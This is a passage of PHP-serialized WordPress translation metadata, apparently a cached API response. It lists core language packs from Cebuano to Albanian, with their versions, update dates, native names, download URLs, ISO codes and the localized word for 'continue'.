15:34:57";s:12:"english_name";s:7:"Cebuano";s:11:"native_name";s:7:"Cebuano";s:7:"package";s:62:"https://downloads.wordpress.org/translation/core/4.4.7/ceb.zip";s:3:"iso";a:2:{i:2;s:3:"ceb";i:3;s:3:"ceb";}s:7:"strings";a:1:{s:8:"continue";s:7:"Padayun";}}s:5:"cs_CZ";a:8:{s:8:"language";s:5:"cs_CZ";s:7:"version";s:5:"4.4.2";s:7:"updated";s:19:"2016-02-11 18:32:36";s:12:"english_name";s:5:"Czech";s:11:"native_name";s:12:"Čeština‎";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.4.2/cs_CZ.zip";s:3:"iso";a:2:{i:1;s:2:"cs";i:2;s:3:"ces";}s:7:"strings";a:1:{s:8:"continue";s:11:"Pokračovat";}}s:2:"cy";a:8:{s:8:"language";s:2:"cy";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-01 16:18:09";s:12:"english_name";s:5:"Welsh";s:11:"native_name";s:7:"Cymraeg";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/cy.zip";s:3:"iso";a:2:{i:1;s:2:"cy";i:2;s:3:"cym";}s:7:"strings";a:1:{s:8:"continue";s:6:"Parhau";}}s:5:"da_DK";a:8:{s:8:"language";s:5:"da_DK";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-29 14:03:59";s:12:"english_name";s:6:"Danish";s:11:"native_name";s:5:"Dansk";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/da_DK.zip";s:3:"iso";a:2:{i:1;s:2:"da";i:2;s:3:"dan";}s:7:"strings";a:1:{s:8:"continue";s:8:"Fortsæt";}}s:5:"de_DE";a:8:{s:8:"language";s:5:"de_DE";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-21 21:20:26";s:12:"english_name";s:6:"German";s:11:"native_name";s:7:"Deutsch";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/de_DE.zip";s:3:"iso";a:1:{i:1;s:2:"de";}s:7:"strings";a:1:{s:8:"continue";s:6:"Weiter";}}s:14:"de_CH_informal";a:8:{s:8:"language";s:14:"de_CH_informal";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-15 12:59:43";s:12:"english_name";s:30:"German (Switzerland, Informal)";s:11:"native_name";s:21:"Deutsch (Schweiz, Du)";s:7:"package";s:73:"https://downloads.wordpress.org/translation/core/4.6.1/de_CH_informal.zip";s:3:"iso";a:1:{i:1;s:2:"de";}s:7:"strings";a:1:{s:8:"continue";s:6:"Weiter";}}s:5:"de_CH";a:8:{s:8:"language";s:5:"de_CH";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-15 12:56:13";s:12:"english_name";s:20:"German (Switzerland)";s:11:"native_name";s:17:"Deutsch (Schweiz)";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/de_CH.zip";s:3:"iso";a:1:{i:1;s:2:"de";}s:7:"strings";a:1:{s:8:"continue";s:6:"Weiter";}}s:12:"de_DE_formal";a:8:{s:8:"language";s:12:"de_DE_formal";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-21 21:21:17";s:12:"english_name";s:15:"German (Formal)";s:11:"native_name";s:13:"Deutsch (Sie)";s:7:"package";s:71:"https://downloads.wordpress.org/translation/core/4.6.1/de_DE_formal.zip";s:3:"iso";a:1:{i:1;s:2:"de";}s:7:"strings";a:1:{s:8:"continue";s:6:"Weiter";}}s:2:"el";a:8:{s:8:"language";s:2:"el";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-09 20:42:31";s:12:"english_name";s:5:"Greek";s:11:"native_name";s:16:"Ελληνικά";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/el.zip";s:3:"iso";a:2:{i:1;s:2:"el";i:2;s:3:"ell";}s:7:"strings";a:1:{s:8:"continue";s:16:"Συνέχεια";}}s:5:"en_CA";a:8:{s:8:"language";s:5:"en_CA";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-11 23:19:29";s:12:"english_name";s:16:"English (Canada)";s:11:"native_name";s:16:"English (Canada)";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/en_CA.zip";s:3:"iso";a:3:{i:1;s:2:"en";i:2;s:3:"eng";i:3;s:3:"eng";}s:7:"strings";a:1:{s:8:"continue";s:8:"Continue";}}s:5:"en_NZ";a:8:{s:8:"language";s:5:"en_NZ";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-20 07:14:07";s:12:"english_name";s:21:"English (New Zealand)";s:11:"native_name";s:21:"English (New Zealand)";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/en_NZ.zip";s:3:"iso";a:3:{i:1;s:2:"en";i:2;s:3:"eng";i:3;s:3:"eng";}s:7:"strings";a:1:{s:8:"continue";s:8:"Continue";}}s:5:"en_ZA";a:8:{s:8:"language";s:5:"en_ZA";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-16 11:54:12";s:12:"english_name";s:22:"English (South Africa)";s:11:"native_name";s:22:"English (South Africa)";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/en_ZA.zip";s:3:"iso";a:3:{i:1;s:2:"en";i:2;s:3:"eng";i:3;s:3:"eng";}s:7:"strings";a:1:{s:8:"continue";s:8:"Continue";}}s:5:"en_AU";a:8:{s:8:"language";s:5:"en_AU";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-12 02:18:44";s:12:"english_name";s:19:"English (Australia)";s:11:"native_name";s:19:"English (Australia)";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/en_AU.zip";s:3:"iso";a:3:{i:1;s:2:"en";i:2;s:3:"eng";i:3;s:3:"eng";}s:7:"strings";a:1:{s:8:"continue";s:8:"Continue";}}s:5:"en_GB";a:8:{s:8:"language";s:5:"en_GB";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-11 22:36:25";s:12:"english_name";s:12:"English (UK)";s:11:"native_name";s:12:"English (UK)";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/en_GB.zip";s:3:"iso";a:3:{i:1;s:2:"en";i:2;s:3:"eng";i:3;s:3:"eng";}s:7:"strings";a:1:{s:8:"continue";s:8:"Continue";}}s:2:"eo";a:8:{s:8:"language";s:2:"eo";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-04 22:04:52";s:12:"english_name";s:9:"Esperanto";s:11:"native_name";s:9:"Esperanto";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/eo.zip";s:3:"iso";a:2:{i:1;s:2:"eo";i:2;s:3:"epo";}s:7:"strings";a:1:{s:8:"continue";s:8:"Daŭrigi";}}s:5:"es_PE";a:8:{s:8:"language";s:5:"es_PE";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-09 09:36:22";s:12:"english_name";s:14:"Spanish (Peru)";s:11:"native_name";s:17:"Español de Perú";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_PE.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_VE";a:8:{s:8:"language";s:5:"es_VE";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-17 12:34:44";s:12:"english_name";s:19:"Spanish (Venezuela)";s:11:"native_name";s:21:"Español de Venezuela";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_VE.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_MX";a:8:{s:8:"language";s:5:"es_MX";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-29 15:07:52";s:12:"english_name";s:16:"Spanish (Mexico)";s:11:"native_name";s:19:"Español de México";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_MX.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_GT";a:8:{s:8:"language";s:5:"es_GT";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-17 17:56:31";s:12:"english_name";s:19:"Spanish (Guatemala)";s:11:"native_name";s:21:"Español de Guatemala";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_GT.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_CL";a:8:{s:8:"language";s:5:"es_CL";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-17 22:11:44";s:12:"english_name";s:15:"Spanish (Chile)";s:11:"native_name";s:17:"Español de Chile";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_CL.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_AR";a:8:{s:8:"language";s:5:"es_AR";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-19 13:48:04";s:12:"english_name";s:19:"Spanish (Argentina)";s:11:"native_name";s:21:"Español de Argentina";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_AR.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_CO";a:8:{s:8:"language";s:5:"es_CO";s:7:"version";s:6:"4.3-RC";s:7:"updated";s:19:"2015-08-04 06:10:33";s:12:"english_name";s:18:"Spanish (Colombia)";s:11:"native_name";s:20:"Español de Colombia";s:7:"package";s:65:"https://downloads.wordpress.org/translation/core/4.3-RC/es_CO.zip";s:3:"iso";a:2:{i:1;s:2:"es";i:2;s:3:"spa";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"es_ES";a:8:{s:8:"language";s:5:"es_ES";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-31 08:03:58";s:12:"english_name";s:15:"Spanish (Spain)";s:11:"native_name";s:8:"Español";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/es_ES.zip";s:3:"iso";a:1:{i:1;s:2:"es";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:2:"et";a:8:{s:8:"language";s:2:"et";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-22 16:41:36";s:12:"english_name";s:8:"Estonian";s:11:"native_name";s:5:"Eesti";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/et.zip";s:3:"iso";a:2:{i:1;s:2:"et";i:2;s:3:"est";}s:7:"strings";a:1:{s:8:"continue";s:6:"Jätka";}}s:2:"eu";a:8:{s:8:"language";s:2:"eu";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-27 18:10:49";s:12:"english_name";s:6:"Basque";s:11:"native_name";s:7:"Euskara";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/eu.zip";s:3:"iso";a:2:{i:1;s:2:"eu";i:2;s:3:"eus";}s:7:"strings";a:1:{s:8:"continue";s:8:"Jarraitu";}}s:5:"fa_IR";a:8:{s:8:"language";s:5:"fa_IR";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-23 20:20:40";s:12:"english_name";s:7:"Persian";s:11:"native_name";s:10:"فارسی";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/fa_IR.zip";s:3:"iso";a:2:{i:1;s:2:"fa";i:2;s:3:"fas";}s:7:"strings";a:1:{s:8:"continue";s:10:"ادامه";}}s:2:"fi";a:8:{s:8:"language";s:2:"fi";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-15 18:30:48";s:12:"english_name";s:7:"Finnish";s:11:"native_name";s:5:"Suomi";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/fi.zip";s:3:"iso";a:2:{i:1;s:2:"fi";i:2;s:3:"fin";}s:7:"strings";a:1:{s:8:"continue";s:5:"Jatka";}}s:5:"fr_BE";a:8:{s:8:"language";s:5:"fr_BE";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-10 18:42:25";s:12:"english_name";s:16:"French (Belgium)";s:11:"native_name";s:21:"Français de Belgique";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/fr_BE.zip";s:3:"iso";a:2:{i:1;s:2:"fr";i:2;s:3:"fra";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuer";}}s:5:"fr_CA";a:8:{s:8:"language";s:5:"fr_CA";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-10 18:17:57";s:12:"english_name";s:15:"French (Canada)";s:11:"native_name";s:19:"Français du Canada";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/fr_CA.zip";s:3:"iso";a:2:{i:1;s:2:"fr";i:2;s:3:"fra";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuer";}}s:5:"fr_FR";a:8:{s:8:"language";s:5:"fr_FR";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-02 11:49:52";s:12:"english_name";s:15:"French (France)";s:11:"native_name";s:9:"Français";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/fr_FR.zip";s:3:"iso";a:1:{i:1;s:2:"fr";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuer";}}s:2:"gd";a:8:{s:8:"language";s:2:"gd";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-23 17:41:37";s:12:"english_name";s:15:"Scottish Gaelic";s:11:"native_name";s:9:"Gàidhlig";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/gd.zip";s:3:"iso";a:3:{i:1;s:2:"gd";i:2;s:3:"gla";i:3;s:3:"gla";}s:7:"strings";a:1:{s:8:"continue";s:15:"Lean air adhart";}}s:5:"gl_ES";a:8:{s:8:"language";s:5:"gl_ES";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-21 15:44:17";s:12:"english_name";s:8:"Galician";s:11:"native_name";s:6:"Galego";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/gl_ES.zip";s:3:"iso";a:2:{i:1;s:2:"gl";i:2;s:3:"glg";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:2:"gu";a:8:{s:8:"language";s:2:"gu";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-08 11:09:06";s:12:"english_name";s:8:"Gujarati";s:11:"native_name";s:21:"ગુજરાતી";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/gu.zip";s:3:"iso";a:2:{i:1;s:2:"gu";i:2;s:3:"guj";}s:7:"strings";a:1:{s:8:"continue";s:31:"ચાલુ રાખવું";}}s:3:"haz";a:8:{s:8:"language";s:3:"haz";s:7:"version";s:5:"4.4.2";s:7:"updated";s:19:"2015-12-05 00:59:09";s:12:"english_name";s:8:"Hazaragi";s:11:"native_name";s:15:"هزاره گی";s:7:"package";s:62:"https://downloads.wordpress.org/translation/core/4.4.2/haz.zip";s:3:"iso";a:1:{i:3;s:3:"haz";}s:7:"strings";a:1:{s:8:"continue";s:10:"ادامه";}}s:5:"he_IL";a:8:{s:8:"language";s:5:"he_IL";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-25 19:56:49";s:12:"english_name";s:6:"Hebrew";s:11:"native_name";s:16:"עִבְרִית";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/he_IL.zip";s:3:"iso";a:1:{i:1;s:2:"he";}s:7:"strings";a:1:{s:8:"continue";s:8:"המשך";}}s:5:"hi_IN";a:8:{s:8:"language";s:5:"hi_IN";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-03 13:43:01";s:12:"english_name";s:5:"Hindi";s:11:"native_name";s:18:"हिन्दी";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/hi_IN.zip";s:3:"iso";a:2:{i:1;s:2:"hi";i:2;s:3:"hin";}s:7:"strings";a:1:{s:8:"continue";s:12:"जारी";}}s:2:"hr";a:8:{s:8:"language";s:2:"hr";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-07 15:12:28";s:12:"english_name";s:8:"Croatian";s:11:"native_name";s:8:"Hrvatski";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/hr.zip";s:3:"iso";a:2:{i:1;s:2:"hr";i:2;s:3:"hrv";}s:7:"strings";a:1:{s:8:"continue";s:7:"Nastavi";}}s:5:"hu_HU";a:8:{s:8:"language";s:5:"hu_HU";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-06 20:18:25";s:12:"english_name";s:9:"Hungarian";s:11:"native_name";s:6:"Magyar";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/hu_HU.zip";s:3:"iso";a:2:{i:1;s:2:"hu";i:2;s:3:"hun";}s:7:"strings";a:1:{s:8:"continue";s:10:"Folytatás";}}s:2:"hy";a:8:{s:8:"language";s:2:"hy";s:7:"version";s:5:"4.4.2";s:7:"updated";s:19:"2016-02-04 07:13:54";s:12:"english_name";s:8:"Armenian";s:11:"native_name";s:14:"Հայերեն";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.4.2/hy.zip";s:3:"iso";a:2:{i:1;s:2:"hy";i:2;s:3:"hye";}s:7:"strings";a:1:{s:8:"continue";s:20:"Շարունակել";}}s:5:"id_ID";a:8:{s:8:"language";s:5:"id_ID";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-22 05:34:53";s:12:"english_name";s:10:"Indonesian";s:11:"native_name";s:16:"Bahasa Indonesia";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/id_ID.zip";s:3:"iso";a:2:{i:1;s:2:"id";i:2;s:3:"ind";}s:7:"strings";a:1:{s:8:"continue";s:9:"Lanjutkan";}}s:5:"is_IS";a:8:{s:8:"language";s:5:"is_IS";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-29 11:28:08";s:12:"english_name";s:9:"Icelandic";s:11:"native_name";s:9:"Íslenska";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/is_IS.zip";s:3:"iso";a:2:{i:1;s:2:"is";i:2;s:3:"isl";}s:7:"strings";a:1:{s:8:"continue";s:6:"Áfram";}}s:5:"it_IT";a:8:{s:8:"language";s:5:"it_IT";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-19 08:05:09";s:12:"english_name";s:7:"Italian";s:11:"native_name";s:8:"Italiano";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/it_IT.zip";s:3:"iso";a:2:{i:1;s:2:"it";i:2;s:3:"ita";}s:7:"strings";a:1:{s:8:"continue";s:8:"Continua";}}s:2:"ja";a:8:{s:8:"language";s:2:"ja";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-01 15:23:06";s:12:"english_name";s:8:"Japanese";s:11:"native_name";s:9:"日本語";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/ja.zip";s:3:"iso";a:1:{i:1;s:2:"ja";}s:7:"strings";a:1:{s:8:"continue";s:9:"続ける";}}s:5:"ka_GE";a:8:{s:8:"language";s:5:"ka_GE";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-29 11:51:34";s:12:"english_name";s:8:"Georgian";s:11:"native_name";s:21:"ქართული";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/ka_GE.zip";s:3:"iso";a:2:{i:1;s:2:"ka";i:2;s:3:"kat";}s:7:"strings";a:1:{s:8:"continue";s:30:"გაგრძელება";}}s:5:"ko_KR";a:8:{s:8:"language";s:5:"ko_KR";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-24 07:18:31";s:12:"english_name";s:6:"Korean";s:11:"native_name";s:9:"한국어";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/ko_KR.zip";s:3:"iso";a:2:{i:1;s:2:"ko";i:2;s:3:"kor";}s:7:"strings";a:1:{s:8:"continue";s:6:"계속";}}s:5:"lt_LT";a:8:{s:8:"language";s:5:"lt_LT";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-11 21:29:34";s:12:"english_name";s:10:"Lithuanian";s:11:"native_name";s:15:"Lietuvių kalba";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/lt_LT.zip";s:3:"iso";a:2:{i:1;s:2:"lt";i:2;s:3:"lit";}s:7:"strings";a:1:{s:8:"continue";s:6:"Tęsti";}}s:2:"lv";a:8:{s:8:"language";s:2:"lv";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-26 17:38:44";s:12:"english_name";s:7:"Latvian";s:11:"native_name";s:16:"Latviešu valoda";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/lv.zip";s:3:"iso";a:2:{i:1;s:2:"lv";i:2;s:3:"lav";}s:7:"strings";a:1:{s:8:"continue";s:9:"Turpināt";}}s:5:"mk_MK";a:8:{s:8:"language";s:5:"mk_MK";s:7:"version";s:5:"4.5.9";s:7:"updated";s:19:"2016-05-12 13:55:28";s:12:"english_name";s:10:"Macedonian";s:11:"native_name";s:31:"Македонски јазик";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.5.9/mk_MK.zip";s:3:"iso";a:2:{i:1;s:2:"mk";i:2;s:3:"mkd";}s:7:"strings";a:1:{s:8:"continue";s:16:"Продолжи";}}s:2:"mr";a:8:{s:8:"language";s:2:"mr";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-13 20:38:52";s:12:"english_name";s:7:"Marathi";s:11:"native_name";s:15:"मराठी";s:7:"package";s:61:"https://downloads.wordpress.org/translation/core/4.6.1/mr.zip";s:3:"iso";a:2:{i:1;s:2:"mr";i:2;s:3:"mar";}s:7:"strings";a:1:{s:8:"continue";s:25:"सुरु ठेवा";}}s:5:"ms_MY";a:8:{s:8:"language";s:5:"ms_MY";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-14 14:18:43";s:12:"english_name";s:5:"Malay";s:11:"native_name";s:13:"Bahasa Melayu";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/ms_MY.zip";s:3:"iso";a:2:{i:1;s:2:"ms";i:2;s:3:"msa";}s:7:"strings";a:1:{s:8:"continue";s:8:"Teruskan";}}s:5:"my_MM";a:8:{s:8:"language";s:5:"my_MM";s:7:"version";s:6:"4.1.18";s:7:"updated";s:19:"2015-03-26 15:57:42";s:12:"english_name";s:17:"Myanmar (Burmese)";s:11:"native_name";s:15:"ဗမာစာ";s:7:"package";s:65:"https://downloads.wordpress.org/translation/core/4.1.18/my_MM.zip";s:3:"iso";a:2:{i:1;s:2:"my";i:2;s:3:"mya";}s:7:"strings";a:1:{s:8:"continue";s:54:"ဆက်လက်လုပ်ဆောင်ပါ။";}}s:5:"nb_NO";a:8:{s:8:"language";s:5:"nb_NO";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-16 13:09:49";s:12:"english_name";s:19:"Norwegian (Bokmål)";s:11:"native_name";s:13:"Norsk bokmål";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/nb_NO.zip";s:3:"iso";a:2:{i:1;s:2:"nb";i:2;s:3:"nob";}s:7:"strings";a:1:{s:8:"continue";s:8:"Fortsett";}}s:12:"nl_NL_formal";a:8:{s:8:"language";s:12:"nl_NL_formal";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-14 13:24:10";s:12:"english_name";s:14:"Dutch (Formal)";s:11:"native_name";s:20:"Nederlands (Formeel)";s:7:"package";s:71:"https://downloads.wordpress.org/translation/core/4.6.1/nl_NL_formal.zip";s:3:"iso";a:2:{i:1;s:2:"nl";i:2;s:3:"nld";}s:7:"strings";a:1:{s:8:"continue";s:8:"Doorgaan";}}s:5:"nl_NL";a:8:{s:8:"language";s:5:"nl_NL";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2017-01-08 18:34:47";s:12:"english_name";s:5:"Dutch";s:11:"native_name";s:10:"Nederlands";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/nl_NL.zip";s:3:"iso";a:2:{i:1;s:2:"nl";i:2;s:3:"nld";}s:7:"strings";a:1:{s:8:"continue";s:8:"Doorgaan";}}s:5:"nn_NO";a:8:{s:8:"language";s:5:"nn_NO";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-10-28 08:58:28";s:12:"english_name";s:19:"Norwegian (Nynorsk)";s:11:"native_name";s:13:"Norsk nynorsk";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/nn_NO.zip";s:3:"iso";a:2:{i:1;s:2:"nn";i:2;s:3:"nno";}s:7:"strings";a:1:{s:8:"continue";s:9:"Hald fram";}}s:3:"oci";a:8:{s:8:"language";s:3:"oci";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-23 13:45:11";s:12:"english_name";s:7:"Occitan";s:11:"native_name";s:7:"Occitan";s:7:"package";s:62:"https://downloads.wordpress.org/translation/core/4.6.1/oci.zip";s:3:"iso";a:2:{i:1;s:2:"oc";i:2;s:3:"oci";}s:7:"strings";a:1:{s:8:"continue";s:9:"Contunhar";}}s:5:"pl_PL";a:8:{s:8:"language";s:5:"pl_PL";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-09-22 09:54:16";s:12:"english_name";s:6:"Polish";s:11:"native_name";s:6:"Polski";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/pl_PL.zip";s:3:"iso";a:2:{i:1;s:2:"pl";i:2;s:3:"pol";}s:7:"strings";a:1:{s:8:"continue";s:9:"Kontynuuj";}}s:2:"ps";a:8:{s:8:"language";s:2:"ps";s:7:"version";s:6:"4.1.18";s:7:"updated";s:19:"2015-03-29 22:19:48";s:12:"english_name";s:6:"Pashto";s:11:"native_name";s:8:"پښتو";s:7:"package";s:62:"https://downloads.wordpress.org/translation/core/4.1.18/ps.zip";s:3:"iso";a:2:{i:1;s:2:"ps";i:2;s:3:"pus";}s:7:"strings";a:1:{s:8:"continue";s:19:"دوام ورکړه";}}s:5:"pt_PT";a:8:{s:8:"language";s:5:"pt_PT";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2017-01-10 08:18:16";s:12:"english_name";s:21:"Portuguese (Portugal)";s:11:"native_name";s:10:"Português";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/pt_PT.zip";s:3:"iso";a:1:{i:1;s:2:"pt";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"pt_BR";a:8:{s:8:"language";s:5:"pt_BR";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-26 14:59:30";s:12:"english_name";s:19:"Portuguese (Brazil)";s:11:"native_name";s:20:"Português do Brasil";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/pt_BR.zip";s:3:"iso";a:2:{i:1;s:2:"pt";i:2;s:3:"por";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuar";}}s:5:"ro_RO";a:8:{s:8:"language";s:5:"ro_RO";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-20 20:55:13";s:12:"english_name";s:8:"Romanian";s:11:"native_name";s:8:"Română";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/ro_RO.zip";s:3:"iso";a:2:{i:1;s:2:"ro";i:2;s:3:"ron";}s:7:"strings";a:1:{s:8:"continue";s:9:"Continuă";}}s:5:"ru_RU";a:8:{s:8:"language";s:5:"ru_RU";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-30 19:40:04";s:12:"english_name";s:7:"Russian";s:11:"native_name";s:14:"Русский";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/ru_RU.zip";s:3:"iso";a:2:{i:1;s:2:"ru";i:2;s:3:"rus";}s:7:"strings";a:1:{s:8:"continue";s:20:"Продолжить";}}s:5:"sk_SK";a:8:{s:8:"language";s:5:"sk_SK";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-12-08 14:52:32";s:12:"english_name";s:6:"Slovak";s:11:"native_name";s:11:"Slovenčina";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/sk_SK.zip";s:3:"iso";a:2:{i:1;s:2:"sk";i:2;s:3:"slk";}s:7:"strings";a:1:{s:8:"continue";s:12:"Pokračovať";}}s:5:"sl_SI";a:8:{s:8:"language";s:5:"sl_SI";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-11-04 18:38:43";s:12:"english_name";s:9:"Slovenian";s:11:"native_name";s:13:"Slovenščina";s:7:"package";s:64:"https://downloads.wordpress.org/translation/core/4.6.1/sl_SI.zip";s:3:"iso";a:2:{i:1;s:2:"sl";i:2;s:3:"slv";}s:7:"strings";a:1:{s:8:"continue";s:8:"Nadaljuj";}}s:2:"sq";a:8:{s:8:"language";s:2:"sq";s:7:"version";s:5:"4.6.1";s:7:"updated";s:19:"2016-08-14 